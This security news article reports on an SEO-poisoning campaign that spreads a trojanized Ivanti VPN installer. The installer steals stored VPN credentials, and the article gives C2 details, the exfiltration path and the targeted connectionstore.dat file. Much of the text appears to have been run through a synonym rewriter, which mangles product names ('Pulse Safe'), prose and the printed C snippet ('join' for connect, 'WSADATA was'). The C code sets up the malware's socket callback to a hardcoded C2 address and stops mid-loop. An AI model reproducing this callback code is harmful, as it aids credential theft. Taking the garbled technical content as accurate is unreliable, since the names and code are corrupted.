An aggressive web optimization poisoning marketing campaign has surfaced in early October 2025, preying on customers trying to find the authentic Ivanti Pulse Safe VPN shopper.
Attackers have registered lookalike domains comparable to ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that seem official.
Unsuspecting victims clicking on high search outcomes are redirected to those malicious websites, the place a signed MSI file is obtainable for obtain underneath the guise of Ivanti’s Safe Entry Consumer.
The trojanized installer carries a credential-stealing DLL, designed to reap saved VPN connection particulars and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.
Instance of Bing search outcomes with a poisoned web site (Supply – Zscaler)
Zscaler researchers famous a classy referrer-based content material supply tactic utilized by the phishing domains. When accessed instantly in a browser, the websites show benign content material with none obtain hyperlinks, evading fast detection by analysts and safety scanners.
Solely customers arriving by way of search engine referrals—notably from Bing—are proven the malicious obtain button, exploiting the HTTP Referrer header to cloak the true intent of the pages.
As soon as downloaded, the MSI installer drops two malicious DLLs—dwmapi.dll and pulseextension.dll—signed by a authentic certificates authority to additional bypass safety controls.
The risk actor’s faux Ivanti Pulse Safe obtain web site (Supply – Zscaler)
These DLLs embed a sequence of routines to find and parse the Ivanti connection retailer (connectionstore.dat), extracting saved URIs and credentials.
Delving into the an infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a community handshake with a hardcoded IP deal with within the Azure vary (4.239.95.1) on port 8080.
The next C code snippet illustrates the socket setup and knowledge change routine:-
WSADATA was;
WSAStartup(MAKEWORD(2,2), &wsa);
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port = htons(8080);
inet_pton(AF_INET, “4.239.95.1”, &addr.sin_addr);
join(sock, (struct sockaddr*)&addr, sizeof(addr));
// Obtain 48 bytes
recv(sock, buf, 0x30, 0);
// XOR deobfuscation
for(int i=0;i
Reverse-engineered code displaying community communication logic (Supply – Zscaler)
After the preliminary handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the trail /incomeshit, a colloquial label for exfiltration channels.
As a result of the IP resides inside Microsoft Azure’s vary, safety groups might overlook these connections as benign cloud visitors.
By masquerading as trusted software program and incorporating superior evasion strategies, this marketing campaign demonstrates the efficiency of search engine poisoning as an preliminary entry vector.
Organizations ought to validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate customers on verifying official obtain sources.
Steady risk attempting to find referrer-based anomalies stays important to thwarting these stealthy assaults.
Comply with us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most popular Supply in Google.
